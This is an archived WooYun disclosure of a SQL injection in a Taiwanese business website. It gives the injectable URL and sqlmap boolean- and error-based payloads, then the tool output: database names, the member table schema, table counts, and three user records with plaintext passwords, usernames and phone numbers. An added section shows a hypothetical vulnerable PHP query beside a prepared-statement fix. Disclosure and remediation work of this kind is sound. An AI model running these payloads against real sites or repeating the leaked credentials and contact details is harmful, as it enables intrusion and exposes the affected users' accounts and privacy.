
Vulnerability summary (24 watchers)

Defect ID: wooyun-2016-0171691

Title: Yes頂尖!創業網 www site SQL injection (affects a large number of administrators / member users / orders, etc.) (Taiwan region)

Vendor: Yes頂尖!創業網

Author: 路人甲

Submitted: 2016-01-21 17:48

Fixed: 2016-03-05 09:52

Published: 2016-03-05 09:52

Type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: Handed to a third-party partner (Hitcon, the Taiwan internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-01-21: Details sent to the vendor, awaiting vendor handling
2016-01-21: Vendor confirmed; details disclosed to the vendor only
2016-01-31: Details disclosed to core white hats and relevant domain experts
2016-02-10: Details disclosed to regular white hats
2016-02-20: Details disclosed to intern white hats
2016-03-05: Details disclosed to the public

Brief description:

123

Detailed description:

Injection point:

http://**.**.**.**/ally/list_in.php?ID=181&res_number=U2013061822564


Both parameters are injectable (sqlmap output; long lines were cut off on the page):

Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=181 AND 7278=7278&res_number=U2013061822564
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: ID=181 AND (SELECT 8737 FROM(SELECT COUNT(*),CONCAT(0x3a626b713
ELECT (CASE WHEN (8737=8737) THEN 1 ELSE 0 END)),0x3a6378713a,FLOOR(RAND(0)*
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&res_number=U2013061822
Place: GET
Parameter: res_number
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: ID=181&res_number=U2013061822564' AND (SELECT 7111 FROM(SELECT
T(*),CONCAT(0x3a626b713a,(SELECT (CASE WHEN (7111=7111) THEN 1 ELSE 0 END)),
6378713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY
AND 'eyTV'='eyTV
---
there were multiple injection points, please select the one to use for follo
injections:
[0] place: GET, parameter: ID, type: Unescaped numeric (default)
[1] place: GET, parameter: res_number, type: Single quoted string
[q] Quit
>
[15:55:51] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[15:55:51] [INFO] fetching current user
[15:55:52] [INFO] retrieved: yesoneco_yesone@localhost
current user: 'yesoneco_yesone@localhost'


available databases [16]:
[*] information_schema
[*] yesoneco_adminuser
[*] yesoneco_ally
[*] yesoneco_design
[*] yesoneco_member
[*] yesoneco_new2015
[*] yesoneco_news
[*] yesoneco_qa
[*] yesoneco_slds
[*] yesoneco_tool
[*] yesoneco_web
[*] yesoneco_webdb
[*] yesoneco_webdb2
[*] yesoneco_webdb_test
[*] yesoneco_webpage
[*] yesoneco_yestop


Table: member
[15 columns]
+-----------------+------------------+
| Column | Type |
+-----------------+------------------+
| date | datetime |
| ID | int(11) unsigned |
| number | text |
| tel_header | varchar(100) |
| user_cell_phone | varchar(100) |
| user_cell_tel | varchar(100) |
| user_email | varchar(100) |
| user_how_know | varchar(100) |
| user_lastName | varchar(100) |
| user_male | varchar(100) |
| user_man | varchar(100) |
| user_passwd | varchar(100) |
| user_rank | varchar(100) |
| user_userid | varchar(100) |
| web | varchar(100) |
+-----------------+------------------+
3 administrator accounts with plaintext passwords ("???" are non-ASCII names lost in extraction):

[3 entries]
+---------------------+-----+----------------+------------+-----------------+---------------+-------------------------+---------------+---------------+-----------+----------+-------------+-----------+-------------+------+
| date                | ID  | number         | tel_header | user_cell_phone | user_cell_tel | user_email              | user_how_know | user_lastName | user_male | user_man | user_passwd | user_rank | user_userid | web  |
+---------------------+-----+----------------+------------+-----------------+---------------+-------------------------+---------------+---------------+-----------+----------+-------------+-----------+-------------+------+
| NULL                | 130 | U2013052877021 | NULL       | NULL            | NULL          | NULL                    | NULL          | ???           | M         | 2        | q123456     | 1         | yesone91    | NULL |
| 2013-07-22 16:26:32 | 132 | U2013061822564 | 02         | 0229925205      | 29925205      | DoMo4690@**.**.**.**    | ??????        | ??            | F         | 0        | 821228      | NULL      | yesone123   | 2    |
| 2013-08-01 18:36:00 | 134 | U2013080155471 | 02         | 0918965658      | 2921578       | **.**.**.**@**.**.**.** | ??????        | ???           | M         | 2        | 00882299    | NULL      | wei70       | NULL |
+---------------------+-----+----------------+------------+-----------------+---------------+-------------------------+---------------+---------------+-----------+----------+-------------+-----------+-------------+------+


Close to 2000 users:

Database: yesoneco_member
+--------+---------+
| Table | Entries |
+--------+---------+
| member | 1876 |
+--------+---------+




Database: yesoneco_webdb
+----------+---------+
| Table | Entries |
+----------+---------+
| customer | 619 |
+----------+---------+


Also dumped 49 admin accounts:

Database: yesoneco_webdb
+-------+---------+
| Table | Entries |
+-------+---------+
| admin | 49 |
+-------+---------+


Orders:

Database: yesoneco_webdb
+----------+---------+
| Table | Entries |
+----------+---------+
| ORDER_TB | 4436 |
+----------+---------+


Proof of vulnerability:

(Identical to the detailed description above.)

Fix recommendation:
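The report leaves the fix section empty. What follows is an added example, not code from the site or from the reporter: a hypothetical reconstruction of how /ally/list_in.php most likely builds its query, which explains why sqlmap classifies ID as an "Unescaped numeric" injection point and res_number as a "Single quoted string" one, beside a hardened version that validates the inputs and binds them through a mysqli prepared statement. The parameter names ID and res_number, the member table and its column names are taken from the sqlmap output above; the query shape, the "U" + 13-digit member-number format, the function names and the connection details are assumptions.

```php
<?php
// Added example (hypothetical reconstruction), not the site's own code.
// Parameter, table and column names are from the sqlmap output on this page;
// the query shape and the member-number format are assumptions.

declare(strict_types=1);

// BEFORE: the query shape that produces exactly the two sqlmap findings.
// Shown only to explain the two injection contexts; do not use.
function vulnerableQuery(array $get): string
{
    // ID is interpolated bare, so the context is numeric: no quote is needed
    // to break out, and "ID=181 AND 7278=7278" is parsed as SQL as-is
    // (sqlmap: "Unescaped numeric").
    // res_number is interpolated inside single quotes, so the payload must
    // close the quote, inject, and re-balance it:
    //   res_number=U2013061822564' AND (...) AND 'eyTV'='eyTV
    // (sqlmap: "Single quoted string").
    return "SELECT * FROM member WHERE ID = " . $get['ID']
         . " AND number = '" . $get['res_number'] . "'";
}

// AFTER: validate the input shape, then bind values with a prepared statement
// so the SQL text and the data never mix.
function safeLookup(mysqli $db, array $get): ?array
{
    $id = filter_var(
        $get['ID'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    $resNumber = (string) ($get['res_number'] ?? '');

    // Member numbers in the dump look like "U" + 13 digits (U2013061822564);
    // the exact format is an assumption, adjust it to the real one.
    if ($id === false || !preg_match('/^U\d{13}$/', $resNumber)) {
        return null; // reject before anything reaches the database
    }

    $stmt = $db->prepare(
        'SELECT ID, number, user_userid, user_email FROM member WHERE ID = ? AND number = ?'
    );
    $stmt->bind_param('is', $id, $resNumber); // i = int, s = string
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // get_result() needs mysqlnd
    $stmt->close();

    return $row ?: null;
}

// Usage sketch (connection details are placeholders):
//   mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw, never echo SQL errors
//   $db = new mysqli('localhost', 'app_user', 'secret', 'yesoneco_member');
//   $row = safeLookup($db, $_GET);
```

Three further points the dump itself supports. The working technique was error-based injection, which only succeeds because MySQL error text reaches the HTTP response; in production set display_errors=Off and log database errors server-side. The application account yesoneco_yesone@localhost can enumerate 16 databases, so one injectable PHP file exposes the admin, customer and ORDER_TB tables in other databases; each application should get its own least-privilege account scoped to the tables it needs. And the member table stores user_passwd in plaintext, which is why three admin passwords appear verbatim above; password_hash() and password_verify() should replace that.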

Copyright notice: when reposting, please credit 路人甲@乌云 (WooYun).


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2016-01-21 22:58

Vendor reply:

Thanks for the report!

Latest status:

None yet